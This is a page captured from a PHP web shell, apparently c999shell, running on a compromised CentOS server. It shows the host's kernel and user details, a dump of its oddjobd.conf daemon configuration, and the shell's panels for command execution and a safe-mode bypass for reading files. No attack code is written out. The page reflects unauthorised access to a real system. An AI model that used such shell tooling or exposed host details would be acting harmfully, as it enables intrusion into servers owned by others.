Software: Apache/2.2.3 (CentOS). PHP/5.1.6 uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44 uid=48(apache) gid=48(apache) groups=48(apache) Safe-mode: OFF (not secure) /etc/ drwxr-xr-x |
Viewing file: oddjobd.conf (4.35 KB) -rw-r--r-- Select action/file-type: (+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) | <?xml version="1.0"?> <!-- This configuration file controls the oddjob daemon. It controls which requests the daemon will recognize, and whether or not it will attempt to fulfill them on the behalf of particular users. Create and edit oddjobd-local.conf rather than changing this file directly. Each <oddjobconfig> contains a mixture of <service> and <include> nodes. Each <service> element corresponds to a well-known D-Bus address (given in the "name" attribute) which the oddjobd daemon will answer to. It may contain one or more <object> elements which each describe an object path. Each <object>, in turn, is named by its "name" attribute. Each <object> element must also contain zero or more <interface> elements, which are named by their "name" attributes and correspond to names of interfaces which the object implements. Each <interface> element must contain zero or more <method> elements, which are named by their "name" attributes. Each <method> node corresponds to a D-Bus method implemented by the object as part of the interface. Each method must include an access-control list which contains at least one rule, or the daemon will ignore any attempts to call the method. When checking if a client is allowed to use a method, all deny rules are processed, then all allow rules. The first rule which matches the user decides whether access is allowed or denied. Access rules can specify either a user (using the "user" attribute), or a range of UIDs (using the "min_uid" and "max_uid" attributes). If SELinux support was compiled in, then a rule can also specify whether or not it applies if the SELinux policy is being enforced ("selinux_enforcing"), or what the caller's SELinux context ("selinux_context"), user ("selinux_user"), role ("selinux_role"), or type ("selinux_type") must be for that rule to apply. A method may, as part of its definition, specify an external program which is to be run when the method is invoked, by including a <helper> node. The <helper> node should include an "exec" attribute naming the external program which will be launched to accomplish the given task. Depending on the value of its "argument_passing_method" attribute, it will receive its arguments either over stdin, one argument per line, or on the command line. Depending on the value of the "prepend_user_name" attribute, the argument list may or may not begin with the calling user's name. The helper will be run with superuser privileges. Here's what an example oddjobd-local.conf might look like: <service name="com.redhat.oddjob"> <object name="/com/redhat/oddjob"> <interface name="com.redhat.oddjob"> <method name="mkhomedirfor"> <allow user="root"/> <allow selinux_enforcing="yes" selinux_role="staff_r"/> <allow user="dovecot"/> </method> </interface> </object> <object name="/com/redhat/oddjob"> <interface name="com.redhat.oddjob"> <method name="mkmyhomedir"> <helper exec="/usr/bin/pwd" arguments="0" prepend_user_name="no"/> <allow min_uid="500"/> </method> </interface> </object> </service> --> <oddjobconfig> <service name="com.redhat.oddjob"> <object name="/com/redhat/oddjob"> <interface name="com.redhat.oddjob"> <method name="list"> <allow min_uid="0" max_uid="0"/> </method> <method name="quit"> <allow user="root"/> </method> <method name="reload"> <allow user="root"/> </method> <method name="reboot"> <helper exec="/sbin/reboot" arguments="0"/> </method> <method name="mkmyhomedir"> <helper exec="/usr/lib/oddjob/mkhomedir" arguments="0" prepend_user_name="yes"/> <allow user="root"/> </method> <method name="mkhomedirfor"> <helper exec="/usr/lib/oddjob/mkhomedir" arguments="1"/> <allow user="root"/> </method> </interface> </object> </service> <include ignore_missing="yes">/etc/oddjobd.conf.d/*.conf</include> <include ignore_missing="yes">/etc/oddjobd-local.conf</include> </oddjobconfig> |
:: Command execute :: | |
:: Shadow's tricks :D :: | |
Useful Commands
|
:: Preddy's tricks :D :: | |
Php Safe-Mode Bypass (Read Files)
|
--[ c999shell v. 1.0 pre-release build #16 Modded by Shadow & Preddy | RootShell Security Group | r57 c99 shell | Generation time: 0.0123 ]-- |